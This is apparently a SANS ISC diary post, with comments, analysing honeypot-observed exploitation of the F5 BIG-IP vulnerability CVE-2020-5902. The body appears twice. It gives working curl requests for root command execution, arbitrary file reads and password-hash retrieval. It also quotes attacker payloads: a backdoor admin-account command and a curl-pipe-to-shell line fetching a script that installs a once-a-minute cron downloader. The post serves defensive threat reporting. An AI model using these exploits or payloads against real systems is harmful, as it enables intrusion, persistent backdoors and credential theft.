Summary of CVE-2020-5902 F5 BIG-IP RCE Vulnerability Exploits

Summary of CVE-2020-5902 F5 BIG-IP RCE Vulnerability Exploits
Our honeypots have been busy collecting exploit attempts for CVE-2020-5902, the F5 Networks BigIP vulnerability patched last week. Most of the exploits can be considered recognizance. We only saw one working exploit installing a backdoor. Badpackets reported seeing a DDoS bot being installed. Thanks to Renato for creating a partial map of the IPs hitting our honeypot so far: The simplest way to achieve limited command execution is the use of BigIP command-line interface commands. But the function is a bit limited. However, to achieve full-featured command execution, it is possible to just create an alias that points to "bash". The result is full code execution in three steps (these requests can us POST or GET. I am using GET here to make them easier to display): 1. Create an "alias" to map the "list" command to "bash" `curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'` `{"error":"","output":""}` 2. Write a file to /tmp with the command to be executed `curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'` `[several empty lines as output]` 3. Use the alias to execute the command. `curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'` `{"error":"","output":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}` 4. Optionally: remove the alias. `curl'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'` `{"error":"","output":""}` If you do not need code execution, you can also use "Step 2" to write files, or you can just read arbitrary files in one step using: `curl -k 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release'` `{"output":"BIG-IP release 15.1.0.1 (Final)\n"}` Instead of defining an alias, the technique in step '1' can also be used to execute BigIP CLI command directly, for example, to retrieve password hashes (note this only work if the alias is not defined): `curl 'https://f5.sans.edu//tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'` `{"error":"","output":"auth user admin {\n description \"Admin User\"\n encrypted-password $6$oeE7u1cp$5cOu9tYnEiXYx\/6UuyOTfgJw5nUgXnetzipHdcX7oRc3xwehAFdQGmhzocud3CGH6MYZgqLGb8u6KiITWBsHi\/\n partition Common\n partition-access {\n all-partitions {\n role admin\n }\n }\n shell none\n}\n"}` Most of the commands I have seen so far are "id", "ls" and retrieving files like "/etc/paswd" and the BigIP license file. More interesting commands: * Adding a backdoor root account: tmsh create auth user f5admin password getrektdotcom partition-access add { all-partitions { role admin } } shell bash * Adding a backdoor cron job: curl 217.12.199.179/b.sh\|sh which retrieves: #!/bin/sh ulimit -n 65535 rm -f /etc/ld.so.preload LDR="wget -q -O -" if [ -s /usr/bin/curl ]; then LDR="curl" fi if [ -s /usr/bin/wget ]; then LDR="wget -q -O -" fi crontab -l \| grep -e "217.12.199.179" \| grep -v grep if [ $? -eq 0 ]; then echo "cron good" else ( crontab -l 2>/dev/null echo "* * * * * $LDR http://217.12.199.179/b.sh \| sh > /dev/null 2>&1" ) \| crontab - fi this will check the URL once a minute for updates via cron. So far, I have not seen any other scripts return. Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site. --- Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute Twitter\| I will be teaching next: Intrusion Detection In-Depth - SANS London October 2021	Johannes 4247 Posts ISC Handler Jul 7th 2020
Thread locked Subscribe	Jul 7th 2020 1 year ago
"Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site." Have you contacted RIPE NCC to trigger an investigation on the ISP ?	Anonymous
Quote	Jul 7th 2020 1 year ago
will consider that if I see them do that more frequently.	Johannes 4247 Posts ISC Handler
Quote	Jul 7th 2020 1 year ago

Our honeypots have been busy collecting exploit attempts for CVE-2020-5902, the F5 Networks BigIP vulnerability patched last week. Most of the exploits can be considered recognizance. We only saw one working exploit installing a backdoor. Badpackets reported seeing a DDoS bot being installed.

Thanks to Renato for creating a partial map of the IPs hitting our honeypot so far:

The simplest way to achieve limited command execution is the use of BigIP command-line interface commands. But the function is a bit limited. However, to achieve full-featured command execution, it is possible to just create an alias that points to "bash".

The result is full code execution in three steps (these requests can us POST or GET. I am using GET here to make them easier to display):

1. Create an "alias" to map the "list" command to "bash"

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'

{"error":"","output":""}

2. Write a file to /tmp with the command to be executed

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'

[several empty lines as output]

3. Use the alias to execute the command.

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'

{"error":"","output":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}

4. Optionally: remove the alias.

curl'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

{"error":"","output":""}

If you do not need code execution, you can also use "Step 2" to write files, or you can just read arbitrary files in one step using:

curl -k 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release'

{"output":"BIG-IP release 15.1.0.1 (Final)\n"}

Instead of defining an alias, the technique in step '1' can also be used to execute BigIP CLI command directly, for example, to retrieve password hashes (note this only work if the alias is not defined):

curl 'https://f5.sans.edu//tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

{"error":"","output":"auth user admin {\n description \"Admin User\"\n encrypted-password $6$oeE7u1cp$5cOu9tYnEiXYx\/6UuyOTfgJw5nUgXnetzipHdcX7oRc3xwehAFdQGmhzocud3CGH6MYZgqLGb8u6KiITWBsHi\/\n partition Common\n partition-access {\n all-partitions {\n role admin\n }\n }\n shell none\n}\n"}

Most of the commands I have seen so far are "id", "ls" and retrieving files like "/etc/paswd" and the BigIP license file. More interesting commands:

* Adding a backdoor root account:

tmsh create auth user f5admin password getrektdotcom partition-access add { all-partitions { role admin } } shell bash

* Adding a backdoor cron job:

curl 217.12.199.179/b.sh|sh

which retrieves:

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
LDR="wget -q -O -"
fi

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
) | crontab -
fi

this will check the URL once a minute for updates via cron. So far, I have not seen any other scripts return. Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

I will be teaching next: Intrusion Detection In-Depth - SANS London October 2021

Johannes

4247 Posts
ISC Handler

Jul 7th 2020

"Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site."

Have you contacted RIPE NCC to trigger an investigation on the ISP ?

Anonymous

will consider that if I see them do that more frequently.

Johannes

4247 Posts
ISC Handler